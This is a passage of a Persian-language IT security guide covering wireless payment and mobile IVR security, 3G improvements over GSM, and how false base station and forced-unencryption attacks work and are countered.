SVAﺣﺘﻤﹰﺎ ﺻﺎﺣﺐ ﺁﻥ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑﺎﻳﺪ ﺷﺨـﺼﹰﺎ ﺑـﻪ ﺍﻳﻨﻜـﺎﺭ
ﺍﻗﺪﺍﻡ ﻛﻨﺪ.
ﻻ ﺑــﺮﺍﻱ
ﺧــﺪﻣﺎﺕ ﭘﺮﺩﺍﺧــﺖ ﻧﺰﺩﻳــﻚ ﺑــﻲﺳــﻴﻢ ١٧٧ﻣﻌﻤــﻮ ﹰ
ﺧﺮﺩﻩﻓﺮﻭﺷﻴﻬﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺗﻌﺪﺍﺩ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ .ﺍﻳـﻦ ﺗﺮﺍﻛﻨـﺸﻬﺎ
ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺯﻣﺎﻧﻲ ﻛﺎﻣـﻞ ﺷـﻮﻧﺪ ﻛـﻪ ﻣـﺸﺘﺮﻱ ﺩﺭ ﻧﻘﻄـﺔ ﻓـﺮﻭﺵ
ﺻﺮﺍﺣﺘﹰﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﻮﺩ .ﺍﮔﺮ ﭼﻨﻴﻦ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺘﻲ ﺻﻮﺭﺕ
ﻧﮕﺮﻓﺘﻪ ﺑﺎﺷﺪ ،ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ
ﻣﺸﺘﺮﻱ ﺍﺯ ﻃﺮﻳﻖ SVAﻣﺮﺑﻮﻃﻪ ﺑﻄﻮﺭ ﻏﻴﺮﺍﺭﺍﺩﻱ ﺩﭼﺎﺭ ﻛـﺴﺮﻱ
ﮔﺮﺩﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﻉ ﺩﺭﺧﻮﺍﺳﺖ ﭘﺮﺩﺍﺧﺖ ﻭﺟﻪ ،ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﺻﺮﻳﺢ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺍﺟﺒﺎﺭﻱ ﺑﺎﺷﺪ.
ﭘﺎﺳﺦ ﺗﻌﺎﻣﻠﻲ ﺻﻮﺗﻲ
ﺧﺪﻣﺎﺕ ﭘﺎﺳﺦ ﺗﻌﺎﻣﻠﻲ ﺻﻮﺗﻲ ﺳﻴﺎﺭ ) ١٧٨(Mobile IVRﻧﺴﺒﺖ ﺑـﻪ
ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺁﺳﻴﺐ ﭘـﺬﻳﺮ ﻫـﺴﺘﻨﺪ .ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ IVRﻧﺒﺎﻳـﺪ
ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﭘﺮﺑﻬﺎ ﻭ ﻳﺎ ﭘﺮﻣﺨﺎﻃﺮﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺗﻤﺎﻡ ﺍﺗﺼﺎﻻﺕ
- IVRﺍﺯ ﺟﻤﻠــﻪ ﺷــﻤﺎﺭﻩ ﺗﻠﻔــﻦ ﺗﻤــﺎﺱﮔﻴﺮﻧــﺪﻩ ﻭ ﺗﺮﺗﻴــﺐ
ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺛﺒﺖ ﺷﻮﺩ؛ ﺍﻣـﺎ ﺍﻳـﻦ
ﺛﺒﺘﻬﺎ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺷﺎﻣﻞ PINﻭ ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﻣﺸﺘﺮﻱ ﮔﺮﺩﺩ.
ﻧﺴﻞ ﺳﻮﻡ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺑﻪ ﺍﺧﺘﺼﺎﺭ 3Gﺧﻮﺍﻧﺪﻩ ﻣـﻲﺷـﻮﺩ ﻭ
ﺑﻪ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲ ﺳـﻴﻢ ﺩﺭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﺨﺘﻠـﻒ
ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ .ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﺍﻳﻦ ﻃﺮﺡ ﺑـﺎﻻﺑﺮﺩﻥ ﺳـﺮﻋﺖ ﺍﻧﺘﻘـﺎﻝ ﺍﺯ
۹،۵ﻛﻴﻠﻮﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴﻪ ﺑﻪ ۲ﻣﮕﺎﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴـﻪ ﺍﺳـﺖ .ﺩﺭ ﺯﻣﻴﻨـﺔ
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﻫﺪﻑ ﺍﺻﻠﻲ ﻃﺮﺍﺣﻲ ﻳﻚ ﺳﻴﺴﺘﻢ
ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻲ ﺍﺳﺖ ﻛﻪ ﺍﮔـﺮ ﻧﻴـﺎﺯ
ﺑﻪ ﺁﻥ ﺍﺣﺴﺎﺱ ﺷﺪ ﺑﺘﻮﺍﻧﺪ ﺑﺎ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺎﺯﮔﺎﺭﻱ ﭘﻴـﺪﺍ
ﻛﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺗﻲ ﻛﻪ ﻭﻗﻮﻉ ﺁﻧﻬـﺎ ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﻧـﺴﻞ
ﺩﻭﻡ ﻭ ﺣﺘﻲ ﻛﻤﻲ ﭘﻴﺸﺮﻓﺘﻪﺗﺮ ﺍﺯ ﺁﻥ ﻣﻤﻜﻦ ﺑـﻮﺩ ،ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ
ﻧﺴﻞ ﺳﻮﻡ ﺑﻜﻠﻲ ﺣﺬﻑ ﺷﺪﻩﺍﻧﺪ.
ﺍﺳﺘﺤﻜﺎﻡ ﺳﺎﺧﺘﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻧﺴﻞ ﺳﻮﻡ
ﺍﻣﻨﻴﺖ ﻧﺴﻞ ﺳﻮﻡ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻣﻨﻴﺖ GSMﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳـﺖ،
ﺍﻣﺎ ﺑﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺯﻳﺮ:
•
ﻳﻜﻲ ﺍﺯ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺮﺍﻱ ﻏﻠﺒـﻪ ﺑـﺮ ﺣﻤﻠـﻪ ﺍﻱ ﻣﻮﺳـﻮﻡ ﺑـﻪ
ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ١٧٩ﺍﻧﺠﺎﻡ ﮔﺮﻓﺖ .ﺩﺭ ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ
ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﻤﺎﺭﺓ ﺗﻮﺍﻟﻲ ﺑﻪ ﺩﺍﺩﻩﻫـﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﺍﺿﺎﻓﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ ﺩﺳﺘﮕﺎﻩ ﺳﻴﺎﺭ ﺧﻮﺍﻫﺪ
ﺗﻮﺍﻧﺴﺖ ﺷﺒﻜﻪ ﺭﺍ ﻣﻮﺭﺩ ﺷﻨﺎﺳﺎﻳﻲ ﻗﺮﺍﺭ ﺩﻫﺪ.
•
ﻃﻮﻝ ﻛﻠﻴﺪ ﺭﻣـﺰ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﻓﺘـﻪ ﺗـﺎ ﺍﻣﻜـﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻗﻮﻳﺘﺮ ﻫﻢ ﻓﺮﺍﻫﻢ ﺷﻮﺩ.
•
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﻬﺒـﻮﺩ ﺍﻣﻨﻴـﺖ ﺩﺍﺧـﻞ ﺷـﺒﻜﻪﻫـﺎ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻟﺤﺎﻅ ﺷﺪﻩ ﺍﺳﺖ.
ﺁﻣﻮﺯﺵ ﻣﺸﺘﺮﻱ
ﺑﺎﻧﻜﻬﺎ ﺑﺎﻳﺪ ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻲﺳـﻴﻢ
ﺭﺍ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﺁﻣﻮﺯﺵ ﺩﻫﻨﺪ:
176 Stored Value Accounts
177 Close Proximity Wireless Payments
178 Mobile Interactive Voice Response
179 False Base Station
ﺑﺨﺶ ﺳﻮﻡ
ﭘﺮﺩﺍﺧﺘﻬﺎﻱ ﻧﺰﺩﻳﻚ ﺑﻲﺳﻴﻢ
ﻧﮕﺎﻩ ﺑﻪ ﺁﻳﻨﺪﻩ :ﻓﻨﺎﻭﺭﻱ ﻧﺴﻞ ﺳﻮﻡ
١٩٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﺍﻣﻨﻴﺖ ﺑﻪ ﺟﺎﻱ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺳـﻮﺋﻴﭻ ﺷـﺪﻩ
)ﻣﺜﻞ .(GSMﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺗﺼﺎﻻﺕ ﻣﻴـﺎﻥ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﻭ
ﺳﻮﺋﻴﭻ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ.
•
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻫﻮﻳﺖ ﭘﺎﻳﺎﻧﻪ ) ١٨٠(IMEIﺑﺠـﺎﻱ
ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ GSMﻭﺟﻮﺩ ﺩﺍﺷﺖ ،ﺍﺯ ﻧﻮ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ.
•
ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻌﺮﻳﻒ ﻧـﺸﺪﻩ ،ﺍﻣـﺎ ﺭﺍﻫﻨﻤـﺎﻳﻲ
ﺑﺮﺍﻱ ﺍﻧﺘﺨﺎﺏ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ.
•
ﻼ ﺑـﻴﻦ GSMﻭ
ﺩﺭ ﺯﻣﺎﻥ ﮔﺸﺖﺯﺩﻥ ﻣﻴﺎﻥ ﺷﺒﻜﻪﻫﺎ ،ﻣﺜ ﹰ
،3GPPﺗﻨﻬﺎ ﺳﻄﺤﻲ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻛـﺎﺭﺕ
ﻫﻮﺷﻤﻨﺪ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛـﺎﺭﺕ
ﻫﻮﺷــﻤﻨﺪ GSMﺩﺭ ﺷــﺒﻜﻪ 3GPPﺩﺭ ﺑﺮﺍﺑــﺮ ﺣﻤﻠــﺔ
ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠـﻲ ﻫﻤﭽﻨـﺎﻥ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ
ﻧﺪﺍﺭﺩ.
ﺳﻴﺴﺘﻢ ﻧﺴﻞ ﺳﻮﻡ ﻧﺴﺒﺖ ﺑـﻪ ﻫﻤﺘـﺎﻱ GSMﺧـﻮﺩ ﺍﺯ ﺍﻣﻨﻴـﺖ
ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺍﻟﺒﺘﻪ ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﮔﻔﺘـﻪ ﺷـﺪ
ﻫﻮﺷﻤﻨﺪﻱ ﻭ ﺯﻳﺮﻛﻲ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﻫﻴﭽﮕـﺎﻩ ﻧﺒﺎﻳـﺪ ﺩﺳـﺖ ﻛـﻢ
ﮔﺮﻓﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﺩﻳﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺗﺌﻮﺭﻱ ،ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﻧـﺴﻞ
ﻼ ﺑﻪ ﺁﻧﻬﺎ
ﺳﻮﻡ ﻧﻴﺰ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ ﺣﻤﻼﺕ ﺟﺪﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺫﻳ ﹰ
ﺍﺷﺎﺭﻩ ﻣﻲﺷﻮﺩ.
ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ
ﺍﻳﻦ ﺣﻤﻠﻪ ،ﺣﻤﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﻳﺎ ﺍﻳـﺴﺘﮕﺎﻩ
ﺳﻴﺎﺭ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻭ ﺍﺯ ﺍﻳﻦ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﺟﻌﻠـﻲ
ﻣﺘﺼﻞ ﺷﻮﺩ .ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﮔﺎﻫﻲ ﺩﺭ ﻧﻘﺶ
ﺗﻜﺮﺍﺭﻛﻨﻨﺪﻩ ﻭ ﮔﺎﻫﻲ ﻧﻴﺰ ﺩﺭ ﻧﻘﺶ ﺗﻘﻮﻳـﺖﻛﻨﻨـﺪﺓ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ
ﺗﺒــﺎﺩﻟﻲ ﻣﻴــﺎﻥ ﺷــﺒﻜﻪ ﻭ ﻛــﺎﺭﺑﺮ ﻋﻤــﻞ ﻛﻨــﺪ ،ﻭ ﺩﺭ ﺍﻳــﻦ ﻣﻴــﺎﻥ
ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﻳﺎ ﭘﻴﺎﻣﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ.
ﻣﻌﻤﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳﺘﻜﺎﺭﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺗﺒـﺎﺩﻟﻲ ﻣﻴـﺎﻥ
ﺷﺒﻜﻪ ﻭ ﻛﺎﺭﺑﺮ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﺪ .ﺣﻔﺎﻇـﺖ ﺍﺯ ﺟﺎﻣﻌﻴـﺖ ﭘﻴﺎﻣﻬـﺎﻱ
ﺣﻴﺎﺗﻲ ﺷﺒﻜﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﻪ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﺑﺮﺧـﻲ ﺣﻤـﻼﺕ
ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ -ﻛﻪ ﺑﺎ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺻـﻮﺭﺕ
ﻣﻲﮔﻴﺮﺩ -ﻧﻴﺰ ﻛﻤﻚ ﻛﻨﺪ .ﺩﺭ ﺍﻳﻨﺠﺎ ،ﺣﻤﻠـﺔ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ
ﺗﻨﻬﺎ ﺗﺎ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺩﺍﻣـﻪ ﻳﺎﺑـﺪ ﻛـﻪ ﻧﻔـﻮﺫﮔﺮ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ؛
ﺑﺮﺧﻼﻑ ﺣﻤﻼﺕ ﺑﺎﻻ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﭘﺎﻳﺎﻥ ﺩﺧﺎﻟﺖ ﻧﻔﻮﺫﮔﺮ ﻫﻢ ﺍﺩﺍﻣﻪ
180 Integrity Mechanisms for the Terminal Identity
ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﺣﻤﻼﺕ ﻗﺎﺑﻞ ﻗﻴﺎﺱ ﺑﺎ ﺣﻤﻼﺗﻲ ﭼﻮﻥ ﺍﺭﺳﺎﻝ
ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨـﻮﺍﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻡ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﺧﻨﺜﻲ ﻛﻨﻴﻢ ،ﺑﺎ ﻣـﺸﻜﻼﺕ ﺯﻳـﺎﺩﻱ ﺭﻭﺑـﺮﻭ
ﻫﺴﺘﻴﻢ.
ﺍﺟﺒﺎﺭ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻣﺰ ﻧﺸﺪﻩ
ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻧﻴﺰ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﻳـﺎ ﺍﻳـﺴﺘﮕﺎﻩ ﺳـﻴﺎﺭ
ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺑﺮ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑـﻪ ﺍﻳـﺴﺘﮕﺎﻩ
ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﻨﺪ ،ﻣﻬﺎﺟﻢ ﻗﺮﺑـﺎﻧﻲ ﺭﺍ ﺑـﺎ ﻳـﻚ ﺗﻤـﺎﺱ
ﺗﻠﻔﻨﻲ ﻣﺨﺎﻃﺐ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ .ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﺭﻭﺍﻝ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﻭﻟﻴـﻪ ﺭﺍ
ﻛﻪ ﻣﻬﺎﺟﻢ ﻣﻴﺎﻥ ﺷﺒﻜﺔ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻭ ﺍﻭ ﺑﺮﻗﺮﺍﺭ ﻛـﺮﺩﻩ ﺁﻏﺎﺯ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻋﻨﺎﺻﺮ ﺍﺭﺳﺎﻝ ﺳﻴﮕﻨﺎﻟﻬﺎ ﻃﻮﺭﻱﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺍﻳﻨﻄﻮﺭ ﺑﻨﻈﺮ ﺑﺮﺳﺪ ﻛﻪ ﮔﻮﻳﻲ ﻛـﺎﺭﺑﺮ
ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻤﻲﺧﻮﺍﻫﺪ ﺩﺭ ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﺪ .ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﻣﻬﺎﺟﻢ ﺍﺭﺗﺒـﺎﻁ ﺧـﻮﺩ ﺑـﺎ ﻛـﺎﺭﺑﺮ ﺭﺍ
ﻗﻄﻊ ﻣـﻲﻛﻨـﺪ ﻭ ﺑـﺎ ﺣـﻖﺍﺷـﺘﺮﺍﻙ ﺁﻥ ﻛـﺎﺭﺑﺮ ،ﺍﺯ ﺷـﺒﻜﻪ ﺑـﺮﺍﻱ
ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺳﻬﺎﻱ ﺟﻌﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ.
ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﺎﻣﻌﻴﺖ ﭘﻴﺎﻣﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳـﻦ ﻧـﻮﻉ
ﺣﻤﻠﻪ ﻣﻨﺠـﺮ ﺷـﻮﺩ .ﺑﻄـﻮﺭ ﺧـﺎﺹ ،ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺩﺍﺩﻩﻫـﺎ ﻭ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺭﺳﺎﻝ ﻏﻴﺮﻣﺴﺘﻘﻴﻢ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺍﺗﺼﺎﻝ ،ﺑﻪ ﺷﺒﻜﻪ
ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﻋﺘﺒﺎﺭ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ ﻣـﺸﺮﻭﻉ ﺭﺍ ﺗـﺸﺨﻴﺺ
ﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺣﻔﺎﻇﺖﺷﺪﺓ ﺟﺎﻣﻌﻴـﺖ ﺩﺭ
ﺩﻫﺪ .ﺑﻌﻼﻭﻩ ﺍﺭﺳﺎﻝ ﺩﻭﺭﻩﺍ ﹺ
ﻃﻮﻝ ﻳﻚ ﺍﺗﺼﺎﻝ ،ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ ﺍﺗـﺼﺎﻻﺕ ﺭﻣﺰﻧـﺸﺪﻩ
ﭘﺲ ﺍﺯ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻭﻟﻴﺔ ﺍﺗﺼﺎﻝ ﻛﻤﻚ ﻣﻲﻛﻨﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺳـﺮﻗﺖ
ﺍﺗﺼﺎﻝ ﻣﻴـﺎﻥ ﭘﻴﺎﻣﻬـﺎﻱ ﺩﻭﺭﻩﺍﻱ ﺣﻔـﺎﻇﺘﻲ ﻧﻴـﺰ ﻣﻤﻜـﻦ ﺍﺳـﺖ،
ﻻ ﭼﻨﺪﺍﻥ ﺑﻜﺎﺭ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﻧﻤـﻲﺁﻳـﺪ .ﺑﻄـﻮﺭ ﻛﻠـﻲ
ﻫﺮﭼﻨﺪ ﻣﻌﻤﻮ ﹰ
ﺍﺗﺼﺎﻻﺗﻲ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺁﻧﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﺍﺳﺖ ﻫﻤﻴـﺸﻪ ﺩﺭ ﺑﺮﺍﺑـﺮ
ﺩﺳﺘﻪﺍﻱ ﺍﺯ ﺣﻤﻼﺕ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ.
ﻣﺠﺪﺩﹰﺍ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺍﻳﻦ ﻗﺒﻴﻞ ﺣﻤﻼﺕ ﺑـﺮ
ﺍﺳﺎﺱ ﺍﻳﻨﻜﻪ ﻓﻨﺎﻭﺭﻱ ﭼﮕﻮﻧﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ ﻫﻤﮕـﻲ
ﺟﻨﺒﺔ ﺗﺌﻮﺭﻱ ﺩﺍﺭﻧﺪ .ﺩﺭ ﻛﻞ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧـﺴﻞ ﺳـﻮﻡ ﺍﺯ ﻟﺤـﺎﻅ
ﻓﻨﺎﻭﺭﻱ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺸﺮﻓﺖ ﻛﺮﺩﻩﺍﻧﺪ ،ﺍﻣﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺳﻴﺎﺭ ،ﻻﺯﻣﺴﺖ ،ﺳﺎﻳﺮ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺼﻮﺭﺕ
ﻣﺪﺍﻭﻡ ﺭﻋﺎﻳﺖ ﺷﻮﻧﺪ.
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺯ.
ﻧﺘﻴﺠﻪﮔﻴﺮﻱ
ﺑﺎﻳﺪ ﮔﻔﺖ ﻛﻪ ﻫﺮ ﭼﻪ ﺷﺒﻜﻪﻫﺎ ﺑﻴﺸﺘﺮ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﺎﺷﻨﺪ ،ﻗﺎﺑﻠﻴـﺖ
ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ ﺩﺭ ﺁﻧﻬـﺎ ﺑﻴـﺸﺘﺮ ﻣـﻲﺷـﻮﺩ.
ﻻ ﺩﺭ ﻧﻘﺎﻃﻲ ﺍﺳﺖ ﻛﻪ
ﺑﻴﺸﺘﺮﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻣﻌﻤﻮ ﹰ
